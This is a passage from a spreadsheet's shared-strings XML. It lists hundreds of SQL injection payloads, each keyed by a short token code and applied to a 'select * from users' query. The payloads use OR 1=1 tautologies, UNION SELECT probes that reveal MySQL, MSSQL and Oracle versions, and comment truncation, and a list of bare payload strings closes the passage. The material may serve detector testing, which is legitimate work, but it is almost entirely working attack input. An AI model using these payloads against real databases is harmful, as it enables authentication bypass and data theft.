    <t>ooUE1: select * from users where id = 1&lt;@&lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>ooUEf: select * from users where id = 1 &lt;@&lt;@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>ooUEv: select * from users where id = 1 &lt;@&lt;@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>oov&amp;1: select * from users where id = 1 %!&lt;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>oovUE: select * from users where id = 1 &lt;@&amp;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>os: select * from users where id = 1 &lt;@$$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>ov&amp;1c: select * from users where id = 1 &amp;@ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s&amp;&amp;o1: select * from users where id = '1' or ||/1 = 1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>s&amp; (  ) o: select * from users where id = '1' or  ( \ )  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp; ( . ) : select * from users where id = '1' or  ( \. )  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp; ( 1 ) : select * from users where id = '1' or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>s&amp;.o&amp;: select * from users where id = '1' or \.&lt;\ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>s&amp;.o1: select * from users where id = '1' or \.&lt;1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp;.oU: select * from users where id = '1' or \.&lt;\ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp;.on: select * from users where id = '1' or \.&lt;$ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp;.oo: select * from users where id = '1' or \.&lt;  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp;1UE: select * from users where id = '1' ||1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>s&amp;1c: select * from users where id = '1'   or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>s&amp;1oo: select * from users where id = '1' or 1^ = 1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>s&amp;n.o: select * from users where id = '1' or $ . = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp;n1&amp;: select * from users where id = '1' or $ 1 = 1 or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>s&amp;n1U: select * from users where id = '1' or $ 1 = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp;no&amp;: select * from users where id = '1' or $&lt;\ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>s&amp;no.: select * from users where id = '1' or $&lt;\. union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp;noU: select * from users where id = '1' or $&lt;\ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp;noo: select * from users where id = '1' or $+&lt;$ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp;o.&amp;: select * from users where id = '1' or \&lt;\. or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>s&amp;o.U: select * from users where id = '1' or \&lt;\. union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp;o1&amp;: select * from users where id = '1' or \&lt;1 or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>s&amp;o1U: select * from users where id = '1' or !&lt;1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>s&amp;oUE: select * from users where id = '1' or \&lt;\ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp;on&amp;: select * from users where id = '1' or \&lt;$ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>s&amp;onU: select * from users where id = '1' or \&lt;$ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp;oo1: select * from users where id = '1' or \&lt;  = 1 union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s&amp;ov&amp;: select * from users where id = '1' or !&lt;@ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>s&amp;ovU: select * from users where id = '1' or !&lt;@ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>s&amp;v ( 1: select * from users where id = '1' or @ ( 1 )  = 1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>s&amp;v1U: select * from users where id = '1' or @ 1 = 1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>s&amp;vvU: select * from users where id = '1' or @ @1 = 1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>s (  ) s: select * from users where id = 1 or " (  ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ( ,s: select * from users where id = 1 or " ( ," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ( .s: select * from users where id = 1 or " ( ." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ( 1s: select * from users where id = 1 or " ( 1" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ( :s: select * from users where id = 1 or " ( :" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ( ;s: select * from users where id = 1 or " ( ;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ( ?s: select * from users where id = 1 or " ( ]" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ( UE1: select * from users where id = 1 or 1#" (  union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>s ( UEf: select * from users where id = 1 or 1#" (  union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>s ( UEs: select * from users where id = 1 or 1#" (  union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>s ( UEv: select * from users where id = 1 or 1#" (  union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>s ( c: select * from users where id = 1 or " ( #" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ( n: select * from users where id = 1 or " ( [" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ( ns: select * from users where id = 1 or " ( _" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ( o1&amp;: select * from users where id = 1 or @#" (  = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ( o1U: select * from users where id = 1 or @#" (  = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>s ( os: select * from users where id = 1 or " ( &amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ( v: select * from users where id = 1 or " ( @" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ( {s: select * from users where id = 1 or " ( {" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s )  ( s: select * from users where id = 1 or " )  ( " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ) ,s: select * from users where id = 1 or " ) ," or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ) .s: select * from users where id = 1 or " ) ." = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ) 1s: select * from users where id = 1 or " ) 1" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ) :s: select * from users where id = 1 or " ) :" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ) ;s: select * from users where id = 1 or " ) ;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ) ?s: select * from users where id = 1 or " ) ]" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ) n: select * from users where id = 1 or " ) [" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ) ns: select * from users where id = 1 or " ) $" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ) v: select * from users where id = 1 or " ) @" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s ) {s: select * from users where id = 1 or " ) {" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s, ( s: select * from users where id = 1 or ", ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s, ) s: select * from users where id = 1 or ", ) " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s,,s: select * from users where id = 1 or ",," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s,.s: select * from users where id = 1 or ",." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s,:s: select * from users where id = 1 or ",:" = 1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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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s,o1&amp;: select * from users where id = 1 or 1#", = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s,o1U: select * from users where id = 1 or @#", = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>s,os: select * from users where id = 1 or ",&amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s,{s: select * from users where id = 1 or ",{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s. ( s: select * from users where id = 1 or ". ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s. ) s: select * from users where id = 1 or ". ) "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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s.v: select * from users where id = 1 or ".@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s.{s: select * from users where id = 1 or ".{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s1 ( s: select * from users where id = 1 or "1 ( " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s1 ) s: select * from users where id = 1 or "1 ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s1: select * from users where id = 1 or "1," or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s1:s: select * from users where id = 1 or "1:" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s1;s: select * from users where id = 1 or "1;" = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s1?s: select * from users where id = 1 or "1]" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s1UE1: select * from users where id = 1 or 1#"1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>s1UEf: select * from users where id = 1 or 1#"1 union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>s1UEs: select * from users where id = 1 or 1#"1 union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>s1UEv: select * from users where id = 1 or 1#"1 union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>s1c: select * from users where id = 1 or "1#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s1n: select * from users where id = 1 or "1[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s1ns: select * from users where id = 1 or "1_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s1os: select * from users where id = 1 or "1&amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s1{s: select * from users where id = 1 or "1{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s: select * from users where id = '1' or ""&lt;@ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>s:&amp;1c: select * from users where id = 1 or 1#": or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s: ( s: select * from users where id = 1 or ": ( " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s: ) s: select * from users where id = 1 or ": ) " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s:,s: select * from users where id = 1 or ":," or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s:.s: select * from users where id = 1 or ":." = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s:1s: select * from users where id = 1 or ":1" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s:;s: select * from users where id = 1 or ":;" = 1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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s:os: select * from users where id = 1 or ":%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s:s: select * from users where id = '1' union select ":"_,version (  )  -- 1'</t>
  </si>
  <si>
    <t>s:v: select * from users where id = 1 or ":@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s:{s: select * from users where id = 1 or ":{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s;&amp;1c: select * from users where id = 1 or 1#"; or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s; ( s: select * from users where id = 1 or "; ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s; ) s: select * from users where id = 1 or "; ) " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s;,s: select * from users where id = 1 or ";," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s;.s: select * from users where id = 1 or ";." = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s;1s: select * from users where id = 1 or ";1" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s;:s: select * from users where id = 1 or ";:" = 1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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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";&amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s;s: select * from users where id = '1' union select ";"_,version (  )  -- 1'</t>
  </si>
  <si>
    <t>s;v: select * from users where id = 1 or ";@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s;{s: select * from users where id = 1 or ";{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s?&amp;1c: select * from users where id = 1 or 1#"? or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s? ) s: select * from users where id = 1 or "] ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s?,s: select * from users where id = 1 or "?," or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s?,vc: select * from users where id = '1' union select $["],@@VERSION -- 1'</t>
  </si>
  <si>
    <t>s?.s: select * from users where id = 1 or "]." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s?1s: select * from users where id = 1 or "]1" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s?:s: select * from users where id = 1 or "]:"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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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s?n: select * from users where id = 1 or "?[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s?ns: select * from users where id = 1 or "?_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s?o1&amp;: select * from users where id = 1 or 1#"? = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s?o1U: select * from users where id = 1 or 1#"? = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>s?os: select * from users where id = 1 or "?%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s?s: select * from users where id = '1' union select "?"_,version (  )  -- 1'</t>
  </si>
  <si>
    <t>s?v: select * from users where id = 1 or "?@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s?{s: select * from users where id = 1 or "]{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sUE&amp;o: select * from users where id = '1' union select ||/1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>sUE (  ) : select * from users where id = '1' union select  ( \ ) ,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>sUE ( .: select * from users where id = '1' union select  ( \. ) ,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>sUE ( 1: select * from users where id = '1' union select  ( 1 ) ,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>sUE,v: select * from users where id = '1' union select \,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>sUE.,: select * from users where id = '1' union select \.,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>sUE.c: select * from users where id = '1' union select \.#,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>sUE.o: select * from users where id = '1' union select \.%1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>sUE1k: select * from users where id = '1' union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>sUE1n: select * from users where id = '1' union select 1a,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>sUE1s: select * from users where id = '1' union select 1"!",banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>sUE\c: select * from users where id = '1' union select \#,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>sUEn.: select * from users where id = '1' union select $ .,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>sUEnn: select * from users where id = '1' union select $ _,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>sUEnv: select * from users where id = '1' union select $*$,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>sUEo,: select * from users where id = '1' union select +\,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>sUEo.: select * from users where id = '1' union select +\.,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>sUEo1: select * from users where id = '1' union select !&lt;1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>sUEo\: select * from users where id = '1' union select +\#,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>sUEov: select * from users where id = '1' union select !&lt;@,version (  )  -- 1'</t>
  </si>
  <si>
    <t>sUEv1: select * from users where id = '1' union select @ 1,version (  )  --  1'</t>
  </si>
  <si>
    <t>sUEvk: select * from users where id = '1'   union select null,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>sUEvv: select * from users where id = '1' union select @ @1,version (  )  --  1'</t>
  </si>
  <si>
    <t>s\c: select * from users where id = 1 or "\#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sn ( s: select * from users where id = 1 or "$ ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sn ) s: select * from users where id = 1 or "_ ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sn: select * from users where id = '1' union select "["_,version (  )  -- 1'</t>
  </si>
  <si>
    <t>sn:s: select * from users where id = 1 or "$:" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sn;s: select * from users where id = 1 or "_;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sn?s: select * from users where id = 1 or "$?" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>snUE1: select * from users where id = 1 or 1#"$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>snUEf: select * from users where id = 1 or 1#"$ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>snUEs: select * from users where id = 1 or 1#"$ union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>snUEv: select * from users where id = 1 or 1#"$ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>snc: select * from users where id = 1 or "$#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>snn: select * from users where id = 1 or "$[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>snns: select * from users where id = 1 or "$_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>snos: select * from users where id = 1 or "$&amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>snv: select * from users where id = 1 or "$@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sn{s: select * from users where id = 1 or "_{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>so (  ) &amp;: select * from users where id = '1' * ( \ )  or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>so (  ) U: select * from users where id = '1' +  ( \ )  union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>so ( . ) : select * from users where id = '1' +  ( \. )  union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>so ( 1 ) : select * from users where id = '1' * ( 1 )  union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>so ( s: select * from users where id = 1 or "&amp; ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>so ) s: select * from users where id = 1 or "&amp; ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>so,s: select * from users where id = 1 or "%," or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>so..&amp;: select * from users where id = '1'&lt;@.. or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>so..U: select * from users where id = '1'&lt;@.. union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>so.n&amp;: select * from users where id = '1' &lt;@.$ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>so.nU: select * from users where id = '1' &lt;@._ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>so.s: select * from users where id = 1 or "%." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>so1&amp;1: select * from users where id = '1' + 1||1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>so1UE: select * from users where id = '1' *1 union select 1,banner from v$version where rownum = 1 -- 1'</t>
  </si>
  <si>
    <t>so1s: select * from users where id = 1 or "%1" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>so:s: select * from users where id = 1 or "&amp;:" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>so;s: select * from users where id = 1 or "%;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>so?s: select * from users where id = 1 or "%?" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>soc: select * from users where id = '1' + @&lt;@# union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>son.&amp;: select * from users where id = '1' *$ . or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>son.U: select * from users where id = '1' + $ . union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>son1&amp;: select * from users where id = '1' *$ 1 or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>son: select * from users where id = 1 or "%[" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sonn&amp;: select * from users where id = '1' &lt;@$_ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>sonnU: select * from users where id = '1' &lt;@$_ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>sons: select * from users where id = 1 or "%_" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>soo&amp;1: select * from users where id = '1' + $+%\ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>soo1&amp;: select * from users where id = '1' &lt;@&amp;1 or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>soo1U: select * from users where id = '1' &lt;@&amp;1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>sooUE: select * from users where id = '1' &lt;@&lt;@ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>soon&amp;: select * from users where id = '1' + $+%$ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>soonU: select * from users where id = '1' + $+*$ union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>soos: select * from users where id = 1 or "%&amp;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>soov&amp;: select * from users where id = '1' &lt;@&amp;@ or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>soovU: select * from users where id = '1' %!&lt;@ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>sos: select * from users where id = '1'&lt;@$$ union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>sov ( 1: select * from users where id = '1' + @ ( 1 )  union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>sov1U: select * from users where id = '1' + @ 1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>sov1o: select * from users where id = '1' + @ 1! union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>sovvU: select * from users where id = '1' + @ @1 union select 1,version (  )  -- 1'</t>
  </si>
  <si>
    <t>so{s: select * from users where id = 1 or "%{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sv ( s: select * from users where id = 1 or "@ ( " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sv ) s: select * from users where id = 1 or "@ ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sv:s: select * from users where id = 1 or "@:" = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sv;s: select * from users where id = 1 or "@;" = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>sv?s: select * from users where id = 1 or "@?" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>svUE1: select * from users where id = 1 or 1#"@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>svUEf: select * from users where id = 1 or 1#"@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>svUEs: select * from users where id = 1 or 1#"@ union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>svUEv: select * from users where id = 1 or 1#"@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>svc: select * from users where id = 1 or "@#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>svos: select * from users where id = 1 or "@%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s{ ( s: select * from users where id = 1 or "{ ( " = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s{ ) s: select * from users where id = 1 or "{ ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s{,s: select * from users where id = 1 or "{," = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s{.s: select * from users where id = 1 or "{." or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s{1s: select * from users where id = 1 or "{1" = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s{:s: select * from users where id = 1 or "{:" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s{;s: select * from users where id = 1 or "{;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s{?s: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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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s{c: select * from users where id = 1 or "{#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s{o1&amp;: select * from users where id = 1 or @#"{ = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s{o1U: select * from users where id = 1 or @#"{ = 1 union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>s{os: select * from users where id = 1 or "{%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s{v: select * from users where id = 1 or "{@" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>s{{s: select * from users where id = 1 or "{{" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>v: select * from users where id = 1 + @`\` union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>vc: select * from users where id = 1 + @&lt;1# union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>vo.UE: select * from users where id = 1 + @&lt;@. union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>voUE1: select * from users where id = 1 -@&lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>voUEf: select * from users where id = 1 -@&lt;@ union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>voUEv: select * from users where id = 1 -@&lt;@ union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>voc: select * from users where id = 1 + @&lt;@# union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>'-'</t>
  </si>
  <si>
    <t>' '</t>
  </si>
  <si>
    <t>'&amp;'</t>
  </si>
  <si>
    <t>'^'</t>
  </si>
  <si>
    <t>'*'</t>
  </si>
  <si>
    <t>' or ''-'</t>
  </si>
  <si>
    <t>' or '' '</t>
  </si>
  <si>
    <t>' or ''&amp;'</t>
  </si>
  <si>
    <t>' or ''^'</t>
  </si>
  <si>
    <t>' or ''*'</t>
  </si>
  <si>
    <t>"-"</t>
  </si>
  <si>
    <t>" "</t>
  </si>
  <si>
    <t>"&amp;"</t>
  </si>
  <si>
    <t>"^"</t>
  </si>
  <si>
    <t>"*"</t>
  </si>
  <si>
    <t>" or ""-"</t>
  </si>
  <si>
    <t>" or "" "</t>
  </si>
  <si>
    <t>" or ""&amp;"</t>
  </si>
  <si>
    <t>" or ""^"</t>
  </si>
  <si>
    <t>" or ""*"</t>
  </si>
  <si>
    <t>or true--</t>
  </si>
  <si>
    <t>" or true--</t>
  </si>
  <si>
    <t>' or true--</t>
  </si>
  <si>
    <t>" )  or true--</t>
  </si>
  <si>
    <t>' )  or true--</t>
  </si>
  <si>
    <t>' or 'x' = 'x</t>
  </si>
  <si>
    <t>' )  or  ( 'x' )  =  ( 'x</t>
  </si>
  <si>
    <t>'  )  )   or   (  (  'x'  )  )   =   (  (  'x</t>
  </si>
  <si>
    <t>" or "x" = "x</t>
  </si>
  <si>
    <t>" )  or  ( "x" )  =  ( "x</t>
  </si>
  <si>
    <t>"  )  )   or   (  (  "x"  )  )   =   (  (  "x</t>
  </si>
  <si>
    <t xml:space="preserve">or 1 = 1-- </t>
  </si>
  <si>
    <t>or 1 = 1#</t>
  </si>
  <si>
    <t>or 1 = 1/*</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
